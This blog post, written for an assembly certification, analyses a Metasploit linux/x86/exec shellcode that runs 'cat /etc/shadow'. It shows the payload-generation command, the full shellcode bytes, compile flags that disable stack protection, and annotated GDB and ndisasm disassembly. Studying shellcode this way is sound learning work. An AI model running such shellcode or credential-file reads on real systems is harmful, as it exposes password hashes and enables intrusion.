Source: SecurityTube
I explain every line witch need explication, I hope it's explained enough, if you don't understand something, leave me a commend and I will explain/respond to all questions.
1) We need generate our payload for post analysis
msfpayload linux/x86/exec CMD='cat /etc/shadow' C /* * linux/x86/exec - 51 bytes * http://www.metasploit.com * VERBOSE=false, PrependFork=false, PrependSetresuid=false, * PrependSetreuid=false, PrependSetuid=false, * PrependSetresgid=false, PrependSetregid=false, * PrependSetgid=false, PrependChrootBreak=false, * AppendExit=false, CMD=cat /etc/shadow */ unsigned char buf[] = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68" "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x10\x00\x00\x00\x63" "\x61\x74\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77\x00" "\x57\x53\x89\xe1\xcd\x80"; compilation - gcc -ggdb -z execstack -fno-stack-protector shellcode.c -o shellcode source of .C code can be found here: https://github.com/doomedraven/SLAE/tree/master/SLAEx32/Assignment%205
2) Analyzing with GDB
gdb -q ./shellcode => 0x0804a040 <+0>: push 0xb ; 11 -> __NR_execve 0x0804a042 <+2>: pop eax 0x0804a043 <+3>: cdq ; convert double to quad 0x0804a044 <+4>: push edx ; 0 0x0804a045 <+5>: pushw 0x632d ; .decode('hex') -> '-c' 0x0804a049 <+9>: mov edi,esp; save pointer to -c 0x0804a04b <+11>: push 0x68732f ; hs/ 0x0804a050 <+16>: push 0x6e69622f; nib/ 0x0804a055 <+21>: mov ebx,esp ; save pointer to /bin/bash 0x0804a057 <+23>: push edx 0x0804a058 <+24>: call 0x804a06d; jump to 0x0804a06d <+45> 0x0804a05d <+29>: arpl WORD PTR [ecx+0x74],sp 0x0804a060 <+32>: and BYTE PTR [edi],ch 0x0804a062 <+34>: gs 0x0804a063 <+35>: je 0x804a0c8 0x0804a065 <+37>: das 0x0804a066 <+38>: jae 0x804a0d0 0x0804a068 <+40>: popa 0x0804a069 <+41>: outs dx,DWORD PTR fs:[esi] 0x0804a06b <+43>: ja 0x804a06d 0x0804a06d <+45>: push edi ; jump here and push pointer to -c 0x0804a06e <+46>: push ebx ; push point to start of /bin 0x0804a06f <+47>: mov ecx,esp ; save pointer 0x0804a071 <+49>: int 0x80 ; syscall 0x0804a073 <+51>: add BYTE PTR [eax],al End of assembler dump.
3) Looking with Ndisasm
msfpayload -p linux/x86/exec cmd='cat /etc/shadow' R | ndisasm - -> removed 00000018 E81000 call word 0x2b 0000001B 0000 add [bx+si],al 0000001D 636174 arpl [bx+di+0x74],sp ;cat 00000020 202F and [bx],ch ; / 00000022 657463 gs jz 0x88 ;etc 00000025 2F das ;/ 00000026 7368 jnc 0x90 ;sh 00000028 61 popaw ;a 00000029 646F fs outsw ;do 0000002B 7700 ja 0x2d ;w0 -> removed
4) Generating .dot graph with Libemu
SLAE-513
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
No hay comentarios:
Publicar un comentario